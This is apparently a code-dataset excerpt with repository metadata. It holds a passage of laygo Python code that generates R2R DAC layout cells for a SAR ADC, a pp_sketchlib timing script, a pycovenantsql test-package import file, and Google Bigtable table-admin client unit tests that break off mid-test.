+ np.array([laygen.get_template_xy(name=tap_name, gridname=pg, libname=templib_logic)[0], 0])
# placement
itapl = []
ibcap = []
for i in range(num_row):
if i%2 == 0: tf='R0'
else: tf='MX'
if i == 0:
itapl.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPL'+str(i), templatename=tap_name,
gridname=pg, refinstname=None, xy=array_origin, template_libname=templib_logic))
else:
itapl.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPL'+str(i), templatename=tap_name,
gridname=pg, refinstname=itapl[-1].name, template_libname=templib_logic, direction='top', transform=tf))
ibcap.append(laygen.relplace(name="I" + objectname_pfix + 'IBCAP'+str(i), templatename=bcap_unit_name,
gridname=pg, refinstname=itapl[-1].name, template_libname=workinglib, direction='right', transform=tf))
itapr = []
for i in range(num_row):
if i%2 == 0: tf='R0'
else: tf='MX'
if i == 0:
itapr.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPR'+str(i), templatename=tap_name,
gridname=pg, refinstname=None, xy=tapr_origin, template_libname=templib_logic))
else:
itapr.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPR'+str(i), templatename=tap_name,
gridname=pg, refinstname=itapr[-1].name, template_libname=templib_logic, direction='top', transform=tf))
# pins
pdict = laygen.get_inst_pin_xy(None, None, rg_m3m4_basic_thick)
laygen.pin(name='I', layer=laygen.layers['pin'][4], xy=laygen.get_inst_pin_xy(ibcap[-1].name, 'I', rg_m3m4_basic_thick),
gridname=rg_m3m4_basic_thick)
# power pin
pwr_dim=laygen.get_template_xy(name=itapl[0].cellname, gridname=rg_m2m3, libname=itapl[0].libname)
rvddl_m3 = []
rvssl_m3 = []
rvddr_m3 = []
rvssr_m3 = []
for i in range(0, int(pwr_dim[0]/2)):
rvddl_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvssl_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
refinstname0=itapl[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
for j in range(num_row):
laygen.via(None, xy=np.array([2*i+1, 0]), gridname=rg_m2m3, refinstname=itapl[j].name, refpinname='VDD')
laygen.via(None, xy=np.array([2 * i + 2, 0]), gridname=rg_m2m3, refinstname=itapl[j].name, refpinname='VSS')
# laygen.pin(name = 'VDDL'+str(i), layer = laygen.layers['pin'][3], refobj = rvddl_m3[-1], gridname=rg_m2m3, netname='VDD')
# laygen.pin(name = 'VSSL'+str(i), layer = laygen.layers['pin'][3], refobj = rvssl_m3[-1], gridname=rg_m2m3, netname='VSS')
rvddr_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvssr_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
refinstname0=itapr[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
for j in range(num_row):
laygen.via(None, xy=np.array([2*i+1, 0]), gridname=rg_m2m3, refinstname=itapr[j].name, refpinname='VDD')
laygen.via(None, xy=np.array([2 * i + 2, 0]), gridname=rg_m2m3, refinstname=itapr[j].name, refpinname='VSS')
# laygen.pin(name = 'VDDR'+str(i), layer = laygen.layers['pin'][3], refobj = rvddr_m3[-1], gridname=rg_m2m3, netname='VDD')
# laygen.pin(name = 'VSSR'+str(i), layer = laygen.layers['pin'][3], refobj = rvssr_m3[-1], gridname=rg_m2m3, netname='VSS')
    # M4: horizontal power rails generated from the M3 straps
input_rails_rect = [rvddl_m3, rvssl_m3]
rvddl_m4, rvssl_m4 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='L_M4_',
layer=laygen.layers['metal'][4], gridname=rg_m3m4_basic_thick, netnames=['VDD', 'VSS'], direction='x',
input_rails_rect=input_rails_rect, generate_pin=False, overwrite_start_coord=2, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
x1_phy = laygen.get_xy(obj =bnd_right[0])[0]\
+laygen.get_xy(obj =bnd_right[0].template)[0]
x1 = laygen.grids.get_absgrid_x(rg_m3m4_basic_thick, x1_phy)
input_rails_rect = [rvddr_m3, rvssr_m3]
rvddr_m4, rvssr_m4 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='R_M4_',
layer=laygen.layers['metal'][4], gridname=rg_m3m4_basic_thick, netnames=['VDD', 'VSS'], direction='x',
input_rails_rect=input_rails_rect, generate_pin=False, overwrite_start_coord=None, overwrite_end_coord=x1-2,
offset_start_index=0, offset_end_index=0)
    # M5: vertical power rails (exported as pins) generated from the M4 rails
input_rails_rect = [rvddl_m4, rvssl_m4]
rvddl_m5, rvssl_m5 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='L_M5_',
layer=laygen.layers['pin'][5], gridname=rg_m4m5_thick, netnames=['VDD', 'VSS'], direction='y',
input_rails_rect=input_rails_rect, generate_pin=True, overwrite_start_coord=None, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
y1_phy = laygen.get_xy(obj =bnd_top[0])[1]\
+laygen.get_xy(obj =bnd_top[0].template)[1]
y1 = laygen.grids.get_absgrid_x(rg_m4m5_thick, y1_phy)
input_rails_rect = [rvddr_m4, rvssr_m4]
rvddr_m5, rvssr_m5 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='R_M5_',
layer=laygen.layers['pin'][5], gridname=rg_m4m5_thick, netnames=['VDD', 'VSS'], direction='y',
input_rails_rect=input_rails_rect, generate_pin=True, overwrite_start_coord=None, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
if __name__ == '__main__':
laygen = laygo.GridLayoutGenerator(config_file="laygo_config.yaml")
import imp
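    # 'imp' is deprecated on modern Python (importlib.util.find_spec is the
    # replacement); the try/except below checks whether the BAG framework is
    # installed, falling back to phantom-cell GDS export when it is not.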
try:
imp.find_module('bag')
laygen.use_phantom = False
except ImportError:
laygen.use_phantom = True
tech=laygen.tech
utemplib = tech+'_microtemplates_dense'
logictemplib = tech+'_logic_templates'
ret_libname = 'adc_retimer_ec'
clkdist_libname = 'clk_dis_generated'
laygen.load_template(filename=tech+'_microtemplates_dense_templates.yaml', libname=utemplib)
laygen.load_grid(filename=tech+'_microtemplates_dense_grids.yaml', libname=utemplib)
laygen.load_template(filename=logictemplib+'.yaml', libname=logictemplib)
# laygen.load_template(filename='adc_retimer.yaml', libname=ret_libname)
#laygen.load_template(filename=ret_libname+'.yaml', libname=ret_libname)
laygen.load_template(filename=clkdist_libname+'.yaml', libname=clkdist_libname)
laygen.templates.sel_library(utemplib)
laygen.grids.sel_library(utemplib)
#library load or generation
workinglib = 'adc_sar_generated'
laygen.add_library(workinglib)
laygen.sel_library(workinglib)
if os.path.exists(workinglib+'.yaml'): #generated layout file exists
laygen.load_template(filename=workinglib+'.yaml', libname=workinglib)
laygen.templates.sel_library(utemplib)
#grid
pg = 'placement_basic' #placement grid
rg_m1m2 = 'route_M1_M2_cmos'
rg_m1m2_thick = 'route_M1_M2_thick'
rg_m2m3 = 'route_M2_M3_cmos'
rg_m3m4 = 'route_M3_M4_basic'
rg_m3m4_thick = 'route_M3_M4_thick'
rg_m3m4_basic_thick = 'route_M3_M4_basic_thick'
rg_m4m5 = 'route_M4_M5_basic'
rg_m4m5_thick = 'route_M4_M5_thick'
rg_m4m5_basic_thick = 'route_M4_M5_basic_thick'
rg_m5m6 = 'route_M5_M6_basic'
rg_m5m6_thick = 'route_M5_M6_thick'
rg_m5m6_thick_basic = 'route_M5_M6_thick_basic'
rg_m5m6_basic_thick = 'route_M5_M6_basic_thick'
rg_m5m6_thick2_thick = 'route_M5_M6_thick2_thick'
rg_m6m7_thick = 'route_M6_M7_thick'
rg_m6m7_thick2_thick = 'route_M6_M7_thick2_thick'
rg_m1m2_pin = 'route_M1_M2_basic'
rg_m2m3_pin = 'route_M2_M3_basic'
mycell_list = []
num_bits=9
num_slices=9
slice_order=[0,2,4,6,1,3,5,7]
#load from preset
load_from_file=True
yamlfile_spec="adc_sar_spec.yaml"
yamlfile_size="adc_sar_size.yaml"
    if load_from_file:
with open(yamlfile_spec, 'r') as stream:
specdict = yaml.load(stream)
with open(yamlfile_size, 'r') as stream:
sizedict = yaml.load(stream)
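        # NOTE: bare yaml.load is deprecated in newer PyYAML; pass
        # Loader=yaml.SafeLoader (or use yaml.safe_load) when updating.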
num_bits=sizedict['r2rdac']['num_bits']
num_slices=specdict['n_interleave']
m_latch=sizedict['retimer']['ret_m_latch']
m_ibuf=sizedict['retimer']['ret_m_ibuf']
m_obuf=sizedict['retimer']['ret_m_obuf']
m_srbuf=sizedict['retimer']['ret_m_srbuf']
m_sr=sizedict['retimer']['ret_m_sr']
slice_order=sizedict['slice_order']
m=sizedict['r2rdac']['m']
m_bcap=sizedict['r2rdac']['m_bcap']
num_series=sizedict['r2rdac']['num_series']
sar_name = 'sar_wsamp_bb_doubleSA_array'
ret_name = 'adc_retimer'
clkdist_name = 'clk_dis_viadel_htree'
#tisar_space_name = 'tisaradc_body_space'
space_1x_name = 'space_1x'
#r2r unit
cellname='r2r_dac_unit'
print(cellname+" generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2rdac_unit(laygen, objectname_pfix='R2RUNIT', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4=rg_m3m4, m=m, m_series=num_series, origin=np.array([0, 0]))
laygen.add_template_from_cell()
#r2r half unit
cellname='r2r_dac_unit_half'
print(cellname+" generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2rdac_unit(laygen, objectname_pfix='R2RUNIT_half', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4=rg_m3m4, m=m, m_series=int(num_series/2), origin=np.array([0, 0]))
laygen.add_template_from_cell()
# r2r dac
cellname = 'r2r_dac'
print(cellname + " generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2r_dac(laygen, objectname_pfix='R2R', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4=rg_m3m4, rg_m3m4_basic_thick=rg_m3m4_basic_thick, rg_m4m5_thick=rg_m4m5_thick,
num_bits=num_bits, origin=np.array([0, 0]))
laygen.add_template_from_cell()
# r2r dac bcap unit
cellname = 'r2r_dac_bcap_unit'
print(cellname + " generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2rdac_bcap_unit(laygen, objectname_pfix='BCAPUNIT', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4_basic_thick=rg_m3m4_basic_thick, m=m_bcap, origin=np.array([0, 0]))
laygen.add_template_from_cell()
# r2r dac
cellname = 'r2r_dac_bcap'
print(cellname + " generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2r_dac_bcap(laygen, objectname_pfix='R2R_bcap', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4=rg_m3m4, rg_m3m4_basic_thick=rg_m3m4_basic_thick, rg_m4m5_thick=rg_m4m5_thick,
num_bits=num_bits, origin=np.array([0, 0]))
laygen.add_template_from_cell()
laygen.save_template(filename=workinglib+'.yaml', libname=workinglib)
#bag export, if bag does not exist, gds export
import imp
try:
imp.find_module('bag')
import bag
prj = bag.BagProject()
for mycell in mycell_list:
laygen.sel_cell(mycell)
laygen.export_BAG(prj, array_delimiter=['[', ']'])
except ImportError:
laygen.export_GDS('output.gds', cellname=mycell_list, layermapfile=tech+".layermap") # change layermapfile
| 63.64455 | 151 | 0.604717 | 7,256 | 53,716 | 4.210998 | 0.062431 | 0.032695 | 0.03659 | 0.041368 | 0.81332 | 0.782785 | 0.752839 | 0.72993 | 0.702307 | 0.663983 | 0 | 0.045312 | 0.253481 | 53,716 | 843 | 152 | 63.720047 | 0.716658 | 0.088819 | 0 | 0.522388 | 0 | 0 | 0.058533 | 0.005271 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008955 | false | 0 | 0.016418 | 0 | 0.026866 | 0.007463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f41ca483fb2e8120890a441a6438c8d9e3d8602a | 1,180 | py | Python | test/dist_test.py | nickjcroucher/pp-sketchlib | 66778ab4d8b593b88e0eac3b35cb54c424b32127 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 19 | 2020-01-15T20:58:38.000Z | 2021-08-17T19:26:16.000Z | test/dist_test.py | nickjcroucher/pp-sketchlib | 66778ab4d8b593b88e0eac3b35cb54c424b32127 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 38 | 2020-01-17T08:49:34.000Z | 2022-02-08T20:00:14.000Z | test/dist_test.py | nickjcroucher/pp-sketchlib | 66778ab4d8b593b88e0eac3b35cb54c424b32127 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 5 | 2020-07-12T13:31:51.000Z | 2021-08-24T13:50:42.000Z | import timeit, functools
def dist_test():
    # Intended for the string-based timeit variant sketched in the comments
    # below; it relies on names (pp_sketchlib, names, kmers) that only exist
    # once the __main__ block has run.
    pp_sketchlib.queryDatabase("listeria", "listeria", names, names, kmers, 1)
setup = """
import sys
sys.path.insert(0, "build/lib.macosx-10.9-x86_64-3.7")
import pp_sketchlib
"""
#import numpy as np
#
#from __main__ import dist_test
#
#kmers = np.arange(15, 30, 3)
#
#names = []
#sequences = []
#with open("rfiles.txt", 'r') as refFile:
# for refLine in refFile:
# refFields = refLine.rstrip().split("\t")
# names.append(refFields[0])
# sequences.append(list(refFields[1:]))
#"""
if __name__ == '__main__':
import numpy as np
import sys
sys.path.insert(0, "build/lib.macosx-10.9-x86_64-3.7")
import pp_sketchlib
#from __main__ import dist_test
kmers = np.arange(15, 30, 3)
names = []
sequences = []
with open("rfiles.txt", 'r') as refFile:
for refLine in refFile:
refFields = refLine.rstrip().split("\t")
names.append(refFields[0])
sequences.append(list(refFields[1:]))
t = timeit.Timer(functools.partial(pp_sketchlib.queryDatabase, "listeria", "listeria", names, names, kmers, 1), setup=setup)
print(t.timeit(100))
| 23.6 | 128 | 0.636441 | 159 | 1,180 | 4.566038 | 0.358491 | 0.060606 | 0.066116 | 0.088154 | 0.834711 | 0.834711 | 0.834711 | 0.834711 | 0.834711 | 0.834711 | 0 | 0.041489 | 0.20339 | 1,180 | 49 | 129 | 24.081633 | 0.730851 | 0.277119 | 0 | 0.26087 | 0 | 0.043478 | 0.207637 | 0.079952 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.26087 | 0 | 0.304348 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f447bca32306685eda08ce2e124523bbd5a86ca9 | 453 | py | Python | pycovenantsql/tests/__init__.py | CovenantSQL/python-driver | 63b96f6b5b1d519cab6dfe2cec132556668a22a3 | [
"Apache-2.0"
] | 5 | 2018-10-17T16:35:11.000Z | 2019-05-20T01:56:24.000Z | pycovenantsql/tests/__init__.py | CovenantSQL/python-driver | 63b96f6b5b1d519cab6dfe2cec132556668a22a3 | [
"Apache-2.0"
] | null | null | null | pycovenantsql/tests/__init__.py | CovenantSQL/python-driver | 63b96f6b5b1d519cab6dfe2cec132556668a22a3 | [
"Apache-2.0"
] | 1 | 2019-03-29T23:51:36.000Z | 2019-03-29T23:51:36.000Z | from pycovenantsql.tests.test_basic import *
from pycovenantsql.tests.test_connection import *
from pycovenantsql.tests.test_cursor import *
#from pycovenantsql.tests.test_converters import *
#from pycovenantsql.tests.test_err import *
#from pycovenantsql.tests.test_issues import *
#from pycovenantsql.tests.test_nextset import *
#from pycovenantsql.tests.test_optionfile import *
if __name__ == "__main__":
import unittest2
unittest2.main()
| 32.357143 | 50 | 0.810155 | 55 | 453 | 6.381818 | 0.309091 | 0.387464 | 0.501425 | 0.592593 | 0.638177 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004951 | 0.108168 | 453 | 13 | 51 | 34.846154 | 0.863861 | 0.509934 | 0 | 0 | 0 | 0 | 0.037037 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f489dee392093f2e0ec7bc37dc78e2e15b5941ef | 20,618 | py | Python | bigtable/tests/unit/gapic/v2/test_bigtable_table_admin_client_v2.py | jo2y/google-cloud-python | 1b76727be16bc4335276f793340bb72d32be7166 | [
"Apache-2.0"
] | 1 | 2018-06-29T17:53:28.000Z | 2018-06-29T17:53:28.000Z | bigtable/tests/unit/gapic/v2/test_bigtable_table_admin_client_v2.py | jo2y/google-cloud-python | 1b76727be16bc4335276f793340bb72d32be7166 | [
"Apache-2.0"
] | null | null | null | bigtable/tests/unit/gapic/v2/test_bigtable_table_admin_client_v2.py | jo2y/google-cloud-python | 1b76727be16bc4335276f793340bb72d32be7166 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import pytest
from google.rpc import status_pb2
from google.cloud import bigtable_admin_v2
from google.cloud.bigtable_admin_v2.proto import bigtable_table_admin_pb2
from google.cloud.bigtable_admin_v2.proto import table_pb2
from google.longrunning import operations_pb2
from google.protobuf import empty_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
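        # Record the request for later assertions, then replay the next
        # queued response; if the queued item is an Exception, raise it.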
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
    def __init__(self, responses=None):
        # Use None as the default to avoid a shared mutable default argument.
        self.responses = responses if responses is not None else []
        self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestBigtableTableAdminClient(object):
def test_create_table(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
table = {}
response = client.create_table(parent, table_id, table)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CreateTableRequest(
parent=parent, table_id=table_id, table=table)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
table = {}
with pytest.raises(CustomException):
client.create_table(parent, table_id, table)
def test_create_table_from_snapshot(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = table_pb2.Table(**expected_response)
operation = operations_pb2.Operation(
name='operations/test_create_table_from_snapshot', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
source_snapshot = 'sourceSnapshot-947679896'
response = client.create_table_from_snapshot(parent, table_id,
source_snapshot)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CreateTableFromSnapshotRequest(
parent=parent, table_id=table_id, source_snapshot=source_snapshot)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_table_from_snapshot_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_create_table_from_snapshot_exception',
done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
source_snapshot = 'sourceSnapshot-947679896'
response = client.create_table_from_snapshot(parent, table_id,
source_snapshot)
exception = response.exception()
assert exception.errors[0] == error
def test_list_tables(self):
# Setup Expected Response
next_page_token = ''
tables_element = {}
tables = [tables_element]
expected_response = {
'next_page_token': next_page_token,
'tables': tables
}
expected_response = bigtable_table_admin_pb2.ListTablesResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
paged_list_response = client.list_tables(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.tables[0] == resources[0]
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ListTablesRequest(
parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_tables_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
paged_list_response = client.list_tables(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_table(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
response = client.get_table(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GetTableRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.get_table(name)
def test_delete_table(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
client.delete_table(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DeleteTableRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.delete_table(name)
def test_modify_column_families(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
modifications = []
response = client.modify_column_families(name, modifications)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ModifyColumnFamiliesRequest(
name=name, modifications=modifications)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_modify_column_families_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
modifications = []
with pytest.raises(CustomException):
client.modify_column_families(name, modifications)
def test_drop_row_range(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
client.drop_row_range(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DropRowRangeRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_drop_row_range_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.drop_row_range(name)
def test_generate_consistency_token(self):
# Setup Expected Response
consistency_token = 'consistencyToken-1090516718'
expected_response = {'consistency_token': consistency_token}
expected_response = bigtable_table_admin_pb2.GenerateConsistencyTokenResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
response = client.generate_consistency_token(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GenerateConsistencyTokenRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_generate_consistency_token_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.generate_consistency_token(name)
def test_check_consistency(self):
# Setup Expected Response
consistent = True
expected_response = {'consistent': consistent}
expected_response = bigtable_table_admin_pb2.CheckConsistencyResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
consistency_token = 'consistencyToken-1090516718'
response = client.check_consistency(name, consistency_token)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CheckConsistencyRequest(
name=name, consistency_token=consistency_token)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_check_consistency_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
consistency_token = 'consistencyToken-1090516718'
with pytest.raises(CustomException):
client.check_consistency(name, consistency_token)
def test_snapshot_table(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
data_size_bytes = 2110122398
description_2 = 'description2568623279'
expected_response = {
'name': name_2,
'data_size_bytes': data_size_bytes,
'description': description_2
}
expected_response = table_pb2.Snapshot(**expected_response)
operation = operations_pb2.Operation(
name='operations/test_snapshot_table', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
cluster = 'cluster872092154'
snapshot_id = 'snapshotId-168585866'
description = 'description-1724546052'
response = client.snapshot_table(name, cluster, snapshot_id,
description)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.SnapshotTableRequest(
name=name,
cluster=cluster,
snapshot_id=snapshot_id,
description=description)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_snapshot_table_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_snapshot_table_exception', done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
cluster = 'cluster872092154'
snapshot_id = 'snapshotId-168585866'
description = 'description-1724546052'
response = client.snapshot_table(name, cluster, snapshot_id,
